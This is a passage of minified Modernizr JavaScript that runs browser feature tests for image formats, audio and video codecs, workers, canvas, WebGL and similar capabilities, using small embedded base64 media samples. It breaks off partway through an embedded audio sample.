docElement=document.documentElement;Modernizr.addTest("contextmenu","contextMenu"in docElement&&"HTMLMenuItemElement"in window),Modernizr.addTest("cssall","all"in docElement.style),Modernizr.addTest("willchange","willChange"in docElement.style),Modernizr.addTest("classlist","classList"in docElement),Modernizr.addTest("documentfragment",function(){return"createDocumentFragment"in document&&"appendChild"in docElement});var isSVG="svg"===docElement.nodeName.toLowerCase(),omPrefixes="Moz O ms Webkit",domPrefixes=ModernizrProto._config.usePrefixes?omPrefixes.toLowerCase().split(" "):[];ModernizrProto._domPrefixes=domPrefixes;var hasOwnProp;!function(){var A={}.hasOwnProperty;hasOwnProp=is(A,"undefined")||is(A.call,"undefined")?function(A,e){return e in A&&is(A.constructor.prototype[e],"undefined")}:function(e,t){return A.call(e,t)}}(),ModernizrProto._l={},ModernizrProto.on=function(A,e){this._l[A]||(this._l[A]=[]),this._l[A].push(e),Modernizr.hasOwnProperty(A)&&setTimeout(function(){Modernizr._trigger(A,Modernizr[A])},0)},ModernizrProto._trigger=function(A,e){if(this._l[A]){var t=this._l[A];setTimeout(function(){var A,r;for(A=0;A<t.length;A++)(r=t[A])(e)},0),delete this._l[A]}},Modernizr._q.push(function(){ModernizrProto.addTest=addTest}),Modernizr.addAsyncTest(function(){var A=new Image;A.onerror=function(){addTest("exiforientation",!1,{aliases:["exif-orientation"]})},A.onload=function(){addTest("exiforientation",2!==A.width,{aliases:["exif-orientation"]})},A.src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAYABgAAD/4QAiRXhpZgAASUkqAAgAAAABABIBAwABAAAABgASAAAAAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAIDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD+/iiiigD/2Q=="}),Modernizr.addAsyncTest(function(){function A(){clearTimeout(e),window.removeEventListener("deviceproximity",A),addTest("proximity",!0)}var e,t=300;"ondeviceproximity"in window&&"onuserproximity"in window?(window.addEventListener("deviceproximity",A),e=setTimeout(function(){window.removeEventListener("deviceproximity",A),addTest("proximity",!1)},t)):addTest("proximity",!1)}),Modernizr.addAsyncTest(function(){var A=new Image;A.onload=A.onerror=function(){addTest("jpeg2000",1==A.width)},A.src="data:image/jp2;base64,/0//UQAyAAAAAAABAAAAAgAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAAAEBwEBBwEBBwEBBwEB/1IADAAAAAEAAAQEAAH/XAAEQED/ZAAlAAFDcmVhdGVkIGJ5IE9wZW5KUEVHIHZlcnNpb24gMi4wLjD/kAAKAAAAAABYAAH/UwAJAQAABAQAAf9dAAUBQED/UwAJAgAABAQAAf9dAAUCQED/UwAJAwAABAQAAf9dAAUDQED/k8+kEAGvz6QQAa/PpBABr994EAk//9k="}),Modernizr.addAsyncTest(function(){var A=new Image;A.onload=A.onerror=function(){addTest("jpegxr",1==A.width,{aliases:["jpeg-xr"]})},A.src="data:image/vnd.ms-photo;base64,SUm8AQgAAAAFAAG8AQAQAAAASgAAAIC8BAABAAAAAQAAAIG8BAABAAAAAQAAAMC8BAABAAAAWgAAAMG8BAABAAAAHwAAAAAAAAAkw91vA07+S7GFPXd2jckNV01QSE9UTwAZAYBxAAAAABP/gAAEb/8AAQAAAQAAAA=="}),Modernizr.addAsyncTest(function(){var A=new Image;A.onerror=function(){addTest("webpalpha",!1,{aliases:["webp-alpha"]})},A.onload=function(){addTest("webpalpha",1==A.width,{aliases:["webp-alpha"]})},A.src="data:image/webp;base64,UklGRkoAAABXRUJQVlA4WAoAAAAQAAAAAAAAAAAAQUxQSAwAAAABBxAR/Q9ERP8DAABWUDggGAAAADABAJ0BKgEAAQADADQlpAADcAD++/1QAA=="}),Modernizr.addAsyncTest(function(){var A=new Image;A.onerror=function(){addTest("webpanimation",!1,{aliases:["webp-animation"]})},A.onload=function(){addTest("webpanimation",1==A.width,{aliases:["webp-animation"]})},A.src="data:image/webp;base64,UklGRlIAAABXRUJQVlA4WAoAAAASAAAAAAAAAAAAQU5JTQYAAAD/////AABBTk1GJgAAAAAAAAAAAAAAAAAAAGQAAABWUDhMDQAAAC8AAAAQBxAREYiI/gcA"}),Modernizr.addAsyncTest(function(){var A=new Image;A.onerror=function(){addTest("webplossless",!1,{aliases:["webp-lossless"]})},A.onload=function(){addTest("webplossless",1==A.width,{aliases:["webp-lossless"]})},A.src="data:image/webp;base64,UklGRh4AAABXRUJQVlA4TBEAAAAvAAAAAAfQ//73v/+BiOh/AAA="}),Modernizr.addAsyncTest(function(){function A(A,e,t){function r(e){var r=e&&"load"===e.type?1==n.width:!1,o="webp"===A;addTest(A,o&&r?new Boolean(r):r),t&&t(e)}var n=new Image;n.onerror=r,n.onload=r,n.src=e}var e=[{uri:"data:image/webp;base64,UklGRiQAAABXRUJQVlA4IBgAAAAwAQCdASoBAAEAAwA0JaQAA3AA/vuUAAA=",name:"webp"},{uri:"data:image/webp;base64,UklGRkoAAABXRUJQVlA4WAoAAAAQAAAAAAAAAAAAQUxQSAwAAAABBxAR/Q9ERP8DAABWUDggGAAAADABAJ0BKgEAAQADADQlpAADcAD++/1QAA==",name:"webp.alpha"},{uri:"data:image/webp;base64,UklGRlIAAABXRUJQVlA4WAoAAAASAAAAAAAAAAAAQU5JTQYAAAD/////AABBTk1GJgAAAAAAAAAAAAAAAAAAAGQAAABWUDhMDQAAAC8AAAAQBxAREYiI/gcA",name:"webp.animation"},{uri:"data:image/webp;base64,UklGRh4AAABXRUJQVlA4TBEAAAAvAAAAAAfQ//73v/+BiOh/AAA=",name:"webp.lossless"}],t=e.shift();A(t.name,t.uri,function(t){if(t&&"load"===t.type)for(var r=0;r<e.length;r++)A(e[r].name,e[r].uri)})}),Modernizr.addTest("svgasimg",document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1")),Modernizr.addAsyncTest(function(){function A(){var A=new Image;A.onerror=function(){addTest("datauri",!0),Modernizr.datauri=new Boolean(!0),Modernizr.datauri.over32kb=!1},A.onload=function(){addTest("datauri",!0),Modernizr.datauri=new Boolean(!0),Modernizr.datauri.over32kb=1==A.width&&1==A.height};for(var e="R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==";e.length<33e3;)e="\r\n"+e;A.src="data:image/gif;base64,"+e}-1!==navigator.userAgent.indexOf("MSIE 7.")&&setTimeout(function(){addTest("datauri",!1)},10);var e=new Image;e.onerror=function(){addTest("datauri",!1)},e.onload=function(){1==e.width&&1==e.height?A():addTest("datauri",!1)},e.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw=="}),Modernizr.addAsyncTest(function(){function A(){addTest("blobworkers",!1),e()}function e(){d&&r.revokeObjectURL(d),i&&i.terminate(),a&&clearTimeout(a)}try{var t=window.BlobBuilder,r=window.URL;Modernizr._config.usePrefix&&(t=t||window.MozBlobBuilder||window.WebKitBlobBuilder||window.MSBlobBuilder||window.OBlobBuilder,r=r||window.MozURL||window.webkitURL||window.MSURL||window.OURL);var n,o,i,d,a,s="Modernizr",l="this.onmessage=function(e){postMessage(e.data)}";try{n=new Blob([l],{type:"text/javascript"})}catch(c){}n||(o=new t,o.append(l),n=o.getBlob()),d=r.createObjectURL(n),i=new Worker(d),i.onmessage=function(A){addTest("blobworkers",s===A.data),e()},i.onerror=A,a=setTimeout(A,200),i.postMessage(s)}catch(c){A()}}),Modernizr.addAsyncTest(function(){try{var A="Modernizr",e=new Worker("data:text/javascript;base64,dGhpcy5vbm1lc3NhZ2U9ZnVuY3Rpb24oZSl7cG9zdE1lc3NhZ2UoZS5kYXRhKX0=");e.onmessage=function(t){e.terminate(),addTest("dataworkers",A===t.data),e=null},e.onerror=function(){addTest("dataworkers",!1),e=null},setTimeout(function(){addTest("dataworkers",!1)},200),e.postMessage(A)}catch(t){setTimeout(function(){addTest("dataworkers",!1)},0)}});var cssomPrefixes=ModernizrProto._config.usePrefixes?omPrefixes.split(" "):[];ModernizrProto._cssomPrefixes=cssomPrefixes;var atRule=function(A){var e,t=prefixes.length,r=window.CSSRule;if("undefined"==typeof r)return undefined;if(!A)return!1;if(A=A.replace(/^@/,""),e=A.replace(/-/g,"_").toUpperCase()+"_RULE",e in r)return"@"+A;for(var n=0;t>n;n++){var o=prefixes[n],i=o.toUpperCase()+"_"+e;if(i in r)return"@-"+o.toLowerCase()+"-"+A}return!1};ModernizrProto.atRule=atRule;var hasEvent=function(){function A(A,t){var r;return A?(t&&"string"!=typeof t||(t=createElement(t||"div")),A="on"+A,r=A in t,!r&&e&&(t.setAttribute||(t=createElement("div")),t.setAttribute(A,""),r="function"==typeof t[A],t[A]!==undefined&&(t[A]=undefined),t.removeAttribute(A)),r):!1}var e=!("onblur"in document.documentElement);return A}();ModernizrProto.hasEvent=hasEvent,Modernizr.addTest("ambientlight",hasEvent("devicelight",window)),Modernizr.addTest("hashchange",function(){return hasEvent("hashchange",window)===!1?!1:document.documentMode===undefined||document.documentMode>7}),Modernizr.addTest("inputsearchevent",hasEvent("search")),Modernizr.addTest("pointerevents",function(){var A=!1,e=domPrefixes.length;for(A=Modernizr.hasEvent("pointerdown");e--&&!A;)hasEvent(domPrefixes[e]+"pointerdown")&&(A=!0);return A});var prefixedCSSValue=function(A,e){var t=!1,r=createElement("div"),n=r.style;if(A in n){var o=domPrefixes.length;for(n[A]=e,t=n[A];o--&&!t;)n[A]="-"+domPrefixes[o]+"-"+e,t=n[A]}return""===t&&(t=!1),t};ModernizrProto.prefixedCSSValue=prefixedCSSValue,Modernizr.addTest("audio",function(){var A=createElement("audio"),e=!1;try{e=!!A.canPlayType,e&&(e=new Boolean(e),e.ogg=A.canPlayType('audio/ogg; codecs="vorbis"').replace(/^no$/,""),e.mp3=A.canPlayType('audio/mpeg; codecs="mp3"').replace(/^no$/,""),e.opus=A.canPlayType('audio/ogg; codecs="opus"')||A.canPlayType('audio/webm; codecs="opus"').replace(/^no$/,""),e.wav=A.canPlayType('audio/wav; codecs="1"').replace(/^no$/,""),e.m4a=(A.canPlayType("audio/x-m4a;")||A.canPlayType("audio/aac;")).replace(/^no$/,""))}catch(t){}return e}),Modernizr.addTest("canvas",function(){var A=createElement("canvas");return!(!A.getContext||!A.getContext("2d"))}),Modernizr.addTest("canvastext",function(){return Modernizr.canvas===!1?!1:"function"==typeof createElement("canvas").getContext("2d").fillText}),Modernizr.addTest("contenteditable",function(){if("contentEditable"in docElement){var A=createElement("div");return A.contentEditable=!0,"true"===A.contentEditable}}),Modernizr.addTest("emoji",function(){if(!Modernizr.canvastext)return!1;var A=window.devicePixelRatio||1,e=12*A,t=createElement("canvas"),r=t.getContext("2d");return r.fillStyle="#f00",r.textBaseline="top",r.font="32px Arial",r.fillText("�",0,0),0!==r.getImageData(e,e,1,1).data[0]}),addTest("htmlimports","import"in createElement("link")),Modernizr.addTest("olreversed","reversed"in createElement("ol")),Modernizr.addTest("userdata",!!createElement("div").addBehavior),Modernizr.addTest("video",function(){var A=createElement("video"),e=!1;try{e=!!A.canPlayType,e&&(e=new Boolean(e),e.ogg=A.canPlayType('video/ogg; codecs="theora"').replace(/^no$/,""),e.h264=A.canPlayType('video/mp4; codecs="avc1.42E01E"').replace(/^no$/,""),e.webm=A.canPlayType('video/webm; codecs="vp8, vorbis"').replace(/^no$/,""),e.vp9=A.canPlayType('video/webm; codecs="vp9"').replace(/^no$/,""),e.hls=A.canPlayType('application/x-mpegURL; codecs="avc1.42E01E"').replace(/^no$/,""))}catch(t){}return e}),Modernizr.addTest("vml",function(){var A,e=createElement("div"),t=!1;return isSVG||(e.innerHTML='<v:shape id="vml_flag1" adj="1" />',A=e.firstChild,"style"in A&&(A.style.behavior="url(#default#VML)"),t=A?"object"==typeof A.adj:!0),t}),Modernizr.addTest("webanimations","animate"in createElement("div")),Modernizr.addTest("webgl",function(){var A=createElement("canvas"),e="probablySupportsContext"in A?"probablySupportsContext":"supportsContext";return e in A?A[e]("webgl")||A[e]("experimental-webgl"):"WebGLRenderingContext"in window}),Modernizr.addTest("adownload",!window.externalHost&&"download"in createElement("a")),Modernizr.addTest("audioloop","loop"in createElement("audio")),Modernizr.addAsyncTest(function(){function A(t){clearTimeout(e);var n=t!==undefined&&"loadeddata"===t.type?!0:!1;r.removeEventListener("loadeddata",A,!1),addTest("audiopreload",n),r.parentNode&&r.parentNode.removeChild(r)}var e,t=300,r=createElement("audio"),n=r.style;if(!(Modernizr.audio&&"preload"in r))return void addTest("audiopreload",!1);n.position="absolute",n.height=0,n.width=0;try{if(Modernizr.audio.mp3)r.src="data:audio/mpeg;base64,//MUxAAB6AXgAAAAAPP+c6nf//yi/6f3//MUxAMAAAIAAAjEcH//0fTX6C9Lf//0//MUxA4BeAIAAAAAAKX2/6zv//+IlR4f//MUxBMCMAH8AAAAABYWalVMQU1FMy45//MUxBUB0AH0AAAAADkuM1VVVVVVVVVV//MUxBgBUATowAAAAFVVVVVVVVVVVVVV";else if(Modernizr.audio.m4a)r.src="data:audio/x-m4a;base64,AAAAGGZ0eXBNNEEgAAACAGlzb21pc28yAAAACGZyZWUAAAAfbWRhdN4EAABsaWJmYWFjIDEuMjgAAAFoAQBHAAACiG1vb3YAAABsbXZoZAAAAAB8JbCAfCWwgAAAA+gAAAAYAAEAAAEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAG0dHJhawAAAFx0a2hkAAAAD3wlsIB8JbCAAAAAAQAAAAAAAAAYAAAAAAAAAAAAAAAAAQAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAABUG1kaWEAAAAgbWRoZAAAAAB8JbCAfCWwgAAArEQAAAQAVcQAAAAAAC1oZGxyAAAAAAAAAABzb3VuAAAAAAAAAAAAAAAAU291bmRIYW5kbGVyAAAAAPttaW5mAAAAEHNtaGQAAAAAAAAAAAAAACRkaW5mAAAAHGRyZWYAAAAAAAAAAQAAAAx1cmwgAAAAAQAAAL9zdGJsAAAAW3N0c2QAAAAAAAAAAQAAAEttcDRhAAAAAAAAAAEAAAAAAAAAAAACABAAAAAArEQAAAAAACdlc2RzAAAAAAMZAAEABBFAFQAAAAABftAAAAAABQISCAYBAgAAABhzdHRzAAAAAAAAAAEAAAABAAAEAAAAABxzdHNjAAAAAAAAAAEAAAABAAAAAQAAAAEAAAAUc3RzegAAAAAAAAAXAAAAAQAAABRzdGNvAAAAAAAAAAEAAAAoAAAAYHVkdGEAAABYbWV0YQAAAAAAAAAhaGRscgAAAAAAAAAAbWRpcmFwcGwAAAAAAAAAAAAAAAAraWxzdAAAACOpdG9vAAAAG2RhdGEAAAABAAAAAExhdmY1Mi42NC4y";else if(Modernizr.audio.ogg)r.src="data:audio/ogg;base64,T2dnUwACAAAAAAAAAAD/QwAAAAAAAM2LVKsBHgF2b3JiaXMAAAAAAUSsAAAAAAAAgLsAAAAAAAC4AU9nZ1MAAAAAAAAAAAAA/0MAAAEAAADmvOe6Dy3/////////////////MgN2b3JiaXMdAAAAWGlwaC5PcmcgbGliVm9yYmlzIEkgMjAwNzA2MjIAAAAAAQV2b3JiaXMfQkNWAQAAAQAYY1QpRplS0kqJGXOUMUaZYpJKiaWEFkJInXMUU6k515xrrLm1IIQQGlNQKQWZUo5SaRljkCkFmVIQS0kldBI6J51jEFtJwdaYa4tBthyEDZpSTCnElFKKQggZU4wpxZRSSkIHJXQOOuYcU45KKEG4nHOrtZaWY4updJJK5yRkTEJIKYWSSgelU05CSDWW1lIpHXNSUmpB6CCEEEK2IIQNgtCQVQAAAQDAQBAasgoAUAAAEIqhGIoChIasAgAyAAAEoCiO4iiOIzmSY0kWEBqyCgAAAgAQAADAcBRJkRTJsSRL0ixL00RRVX3VNlVV9nVd13Vd13UgNGQVAAABAEBIp5mlGiDCDGQYCA1ZBQAgAAAARijCEANCQ1YBAAABAABiKDmIJrTmfHOOg2Y5aCrF5nRwItXmSW4q5uacc845J5tzxjjnnHOKcmYxaCa05pxzEoNmKWgmtOacc57E5kFrqrTmnHPGOaeDcUYY55xzmrTmQWo21uaccxa0pjlqLsXmnHMi5eZJbS7V5pxzzjnnnHPOOeecc6oXp3NwTjjnnHOi9uZabkIX55xzPhmne3NCOOecc84555xzzjnnnHOC0JBVAAAQAABBGDaGcacgSJ+jgRhFiGnIpAfdo8MkaAxyCqlHo6ORUuoglFTGSSmdIDRkFQAACAAAIYQUUkghhRRSSCGFFFKIIYYYYsgpp5yCCiqppKKKMsoss8wyyyyzzDLrsLPOOuwwxBBDDK20EktNtdVYY62555xrDtJaaa211koppZRSSikIDVkFAIAAABAIGWSQQUYhhRRSiCGmnHLKKaigAkJDVgEAgAAAAgAAADzJc0RHdERHdERHdERHdETHczxHlERJlERJtEzL1ExPFVXVlV1b1mXd9m1hF3bd93Xf93Xj14VhWZZlWZZlWZZlWZZlWZZlWYLQkFUAAAgAAIAQQgghhRRSSCGlGGPMMeegk1BCIDRkFQAACAAgAAAAwFEcxXEkR3IkyZIsSZM0S7M8zdM8TfREURRN01RFV3RF3bRF2ZRN13RN2XRVWbVdWbZt2dZtX5Zt3/d93/d93/d93/d93/d1HQgNWQUASAAA6EiOpEiKpEiO4ziSJAGhIasAABkAAAEAKIqjOI7jSJIkSZakSZ7lWaJmaqZneqqoAqEhqwAAQAAAAQAAAAAAKJriKabiKaLiOaIjSqJlWqKmaq4om7Lruq7ruq7ruq7ruq7ruq7ruq7ruq7ruq7ruq7ruq7ruq7rui4QGrIKAJAAANCRHMmRHEmRFEmRHMkBQkNWAQAyAAACAHAMx5AUybEsS9M8zdM8TfRET/RMTxVd0QVCQ1YBAIAAAAIAAAAAADAkw1IsR3M0SZRUS7VUTbVUSxVVT1VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVTVN0zRNIDRkJQAABADAYo3B5SAhJSXl3hDCEJOeMSYhtV4hBJGS3jEGFYOeMqIMct5C4xCDHggNWREARAEAAMYgxxBzyDlHqZMSOeeodJQa5xyljlJnKcWYYs0oldhSrI1zjlJHraOUYiwtdpRSjanGAgAAAhwAAAIshEJDVgQAUQAAhDFIKaQUYow5p5xDjCnnmHOGMeYcc44556B0UirnnHROSsQYc445p5xzUjonlXNOSiehAACAAAcAgAALodCQFQFAnACAQZI8T/I0UZQ0TxRFU3RdUTRd1/I81fRMU1U90VRVU1Vt2VRVWZY8zzQ901RVzzRV1VRVWTZVVZZFVdVt03V123RV3ZZt2/ddWxZ2UVVt3VRd2zdV1/Zd2fZ9WdZ1Y/I8VfVM03U903Rl1XVtW3VdXfdMU5ZN15Vl03Vt25VlXXdl2fc103Rd01Vl2XRd2XZlV7ddWfZ903WF35VlX1dlWRh2XfeFW9eV5XRd3VdlVzdWWfZ9W9eF4dZ1YZk8T1U903RdzzRdV3VdX1dd19Y105Rl03Vt2VRdWXZl2fddV9Z1zzRl2XRd2zZdV5ZdWfZ9V5Z13XRdX1dlWfhVV/Z1WdeV4dZt4Tdd1/dVWfaFV5Z14dZ1Ybl1XRg+VfV9U3aF4XRl39eF31luXTiW0XV9YZVt4VhlWTl+4ViW3feVZXRdX1ht2RhWWRaGX/id5fZ943h1XRlu3efMuu8Mx++k+8rT1W1jmX3dWWZfd47hGDq/8OOpqq+brisMpywLv+3rxrP7vrKMruv7qiwLvyrbwrHrvvP8vrAso+z6wmrLwrDatjHcvm4sv3Acy2vryjHrvlG2dXxfeArD83R1XXlmXcf2dXTjRzh+ygAAgAEHAIAAE8pAoSErAoA4AQCPJImiZFmiKFmWKIqm6LqiaLqupGmmqWmeaVqaZ5qmaaqyKZquLGmaaVqeZpqap5mmaJqua5qmrIqmKcumasqyaZqy7LqybbuubNuiacqyaZqybJqmLLuyq9uu7Oq6pFmmqXmeaWqeZ5qmasqyaZquq3meanqeaKqeKKqqaqqqraqqLFueZ5qa6KmmJ4qqaqqmrZqqKsumqtqyaaq2bKqqbbuq7Pqybeu6aaqybaqmLZuqatuu7OqyLNu6L2maaWqeZ5qa55mmaZqybJqqK1uep5qeKKqq5ommaqqqLJumqsqW55mqJ4qq6omea5qqKsumatqqaZq2bKqqLZumKsuubfu+68qybqqqbJuqauumasqybMu+78qq7oqmKcumqtqyaaqyLduy78uyrPuiacqyaaqybaqqLsuybRuzbPu6aJqybaqmLZuqKtuyLfu6LNu678qub6uqrOuyLfu67vqucOu6MLyybPuqrPq6K9u6b+sy2/Z9RNOUZVM1bdtUVVl2Zdn2Zdv2fdE0bVtVVVs2TdW2ZVn2fVm2bWE0Tdk2VVXWTdW0bVmWbWG2ZeF2Zdm3ZVv2ddeVdV/XfePXZd3murLty7Kt+6qr+rbu+8Jw667wCgAAGHAAAAgwoQwUGrISAIgCAACMYYwxCI1SzjkHoVHKOecgZM5BCCGVzDkIIZSSOQehlJQy5yCUklIIoZSUWgshlJRSawUAABQ4AAAE2KApsThAoSErAYBUAACD41iW55miatqyY0meJ4qqqaq27UiW54miaaqqbVueJ4qmqaqu6+ua54miaaqq6+q6aJqmqaqu67q6Lpqiqaqq67qyrpumqqquK7uy7Oumqqqq68quLPvCqrquK8uybevCsKqu68qybNu2b9y6ruu+7/vCka3rui78wjEMRwEA4AkOAEAFNqyOcFI0FlhoyEoAIAMAgDAGIYMQQgYhhJBSSiGllBIAADDgAAAQYEIZKDRkRQAQJwAAGEMppJRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkgppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkqppJRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoplVJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkoppZRSCgCQinAAkHowoQwUGrISAEgFAACMUUopxpyDEDHmGGPQSSgpYsw5xhyUklLlHIQQUmktt8o5CCGk1FJtmXNSWosx5hgz56SkFFvNOYdSUoux5ppr7qS0VmuuNedaWqs115xzzbm0FmuuOdecc8sx15xzzjnnGHPOOeecc84FAOA0OACAHtiwOsJJ0VhgoSErAYBUAAACGaUYc8456BBSjDnnHIQQIoUYc845CCFUjDnnHHQQQqgYc8w5CCGEkDnnHIQQQgghcw466CCEEEIHHYQQQgihlM5BCCGEEEooIYQQQgghhBA6CCGEEEIIIYQQQgghhFJKCCGEEEIJoZRQAABggQMAQIANqyOcFI0FFhqyEgAAAgCAHJagUs6EQY5Bjw1BylEzDUJMOdGZYk5qMxVTkDkQnXQSGWpB2V4yCwAAgCAAIMAEEBggKPhCCIgxAABBiMwQCYVVsMCgDBoc5gHAA0SERACQmKBIu7iALgNc0MVdB0IIQhCCWBxAAQk4OOGGJ97whBucoFNU6iAAAAAAAAwA4AEA4KAAIiKaq7C4wMjQ2ODo8AgAAAAAABYA+AAAOD6AiIjmKiwuMDI0Njg6PAIAAAAAAAAAAICAgAAAAAAAQAAAAICAT2dnUwAE7AwAAAAAAAD/QwAAAgAAADuydfsFAQEBAQEACg4ODg==";else{ if(!Modernizr.audio.wav)return void addTest("audiopreload",!1);r.src="data:audio/wav;base64,UklGRvwZAABXQVZFZm10IBAAAAABAAEARKwAAIhYAQACABAAZGF0YdgZAAAAAAEA/v8CAP//AAABAP////8DAPz/BAD9/wEAAAAAAAAAAAABAP7/AgD//wAAAQD//wAAAQD//wAAAQD+/wIA//8AAAAAAAD//wIA/v8BAAAA//8BAAAA//8BAP//AQAAAP//AQD//wEAAAD//wEA//8BAP//AQD//wEA//8BAP//AQD+/wMA/f8DAP3/AgD+/wIA/////wMA/f8CAP7/AgD+/wMA/f8CAP7/AgD//wAAAAAAAAAAAQD+/wIA/v8CAP7/AwD9/wIA/v8BAAEA/v8CAP7/AQAAAAAAAAD//wEAAAD//wIA/f8DAP7/AQD//wEAAAD//wEA//8CAP7/AQD//wIA/v8CAP7/AQAAAAAAAAD//wEAAAAAAAAA//8BAP//AgD9/wQA+/8FAPz/AgAAAP//AgD+/wEAAAD//wIA/v8CAP3/BAD8/wQA/P8DAP7/AwD8/wQA/P8DAP7/AQAAAAAA//8BAP//AgD+/wEAAAD//wIA/v8BAP//AQD//wEAAAD//wEA//8BAAAAAAAAAP//AgD+/wEAAAAAAAAAAAD//wEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//AgD+/wIA/v8BAP//AQABAP7/AQD//wIA/v8CAP3/AwD/////AgD9/wMA/v8BAP//AQAAAP//AQD//wEA//8BAP//AAABAP//AAABAP//AQD//wAAAAACAP3/AwD9/wIA//8BAP//AQD//wEA//8BAP//AgD9/wMA/v8AAAIA/f8CAAAA/v8EAPv/BAD9/wIAAAD+/wQA+v8HAPr/BAD+/wEAAAD//wIA/f8EAPz/BAD7/wUA/P8EAPz/AwD+/wEAAAD//wEAAAAAAP//AgD8/wUA+/8FAPz/AwD9/wIA//8AAAEA/v8CAP//AQD//wAAAAABAP//AgD9/wMA/f8EAPz/AwD+/wAAAwD7/wUA/P8DAP7/AQAAAP//AgD+/wEAAQD+/wIA/v8BAAEA/v8CAP7/AQAAAP//AgD9/wMA/f8DAP7/AgD+/wEAAAAAAAEA//8AAAEA/v8DAP3/AgD//wEA//8BAP7/AwD9/wMA/v8BAP//AQAAAP//AgD9/wMA/v8BAP//AQAAAP//AgD+/wEAAQD+/wIA/////wIA//8AAAEA/f8DAP//AAABAP////8DAP3/AwD+/wEA//8BAP//AQAAAAAA//8BAP//AQD//wEA//8BAP//AAAAAAEA//8BAP7/AgD//wEA//8AAAAAAAAAAAAAAAD//wIA/v8BAAAA//8BAAEA/v8BAAAA//8DAPz/AwD+/wIA/v8CAP3/AwD+/wEAAAD//wEA//8BAAAA//8BAAAA/v8EAPv/BAD+/wAAAAABAP7/AgD//wAAAAABAP7/AgD//wAAAAAAAAAAAAABAP3/BAD8/wQA/f8BAAAAAAABAP7/AgD+/wIA/v8CAP7/AgD+/wIA/v8BAAAAAAD//wIA/f8DAP7/AAABAP//AAACAPz/BAD9/wIA//8AAP//AwD9/wMA/P8EAP3/AwD9/wIA//8BAP//AQD+/wMA/f8DAP7/AAABAP//AQAAAP//AQD//wIA/f8DAP7/AQAAAP//AQAAAAAA//8CAP7/AQABAP7/AgD+/wEAAQD+/wIA/v8CAP////8CAP7/AgD//wAAAAABAP7/AwD9/wIAAAD+/wMA/f8CAP//AQD+/wMA/f8CAP//AAACAPz/BQD6/wUA/v///wIA/v8CAP3/BAD7/wYA+v8FAPz/AwD/////AgD+/wEAAAD//wEAAAD//wIA/f8DAP7/AQAAAP//AgD//wAA//8BAAAAAAAAAP//AQD//wEA//8AAAIA/f8DAP3/AgAAAP//AQD//wEA//8AAAEA//8BAP////8CAP//AAABAP3/BAD9/wIA/v8BAAEA//8BAP7/AgD//wEA//8AAAEA//8BAP//AAAAAAEA//8BAP7/AgD//wEA//8AAAAAAQD+/wIA/v8BAAAAAAD//wIA/v8BAAAAAAAAAAAAAQD+/wMA/f8CAP//AQD//wIA/f8DAP7/AQD//wEA//8CAP7/AAABAP7/AwD9/wMA/v8AAAEA//8BAAAAAAD//wIA/v8BAAAA//8CAP7/AgD+/wEA//8CAP7/AgD//wAAAAAAAAAAAQD//wEA/v8DAPz/BQD8/wIA//8AAAEAAAD//wEA//8BAP//AQAAAAAA//8BAP//AgD+/wEAAAAAAP//AQD+/wMA/////wEA/v8CAP//AQD//wEA//8AAAEA//8BAAAA/v8EAPz/AwD+/wEAAAAAAAAA//8CAP7/AQD//wEA//8BAP//AAABAP7/AwD9/wIA//8BAP//AQD//wEA//8AAAEA/v8EAPv/BAD9/wIA//8BAP7/AwD9/wIA//8AAAEA//8BAP//AQD//wAAAQD//wEAAAD+/wMA/v8AAAIA/f8DAP7/AQD//wAAAQD+/wMA/f8CAP//AAABAP7/AgD+/wMA/f8CAP7/AQABAP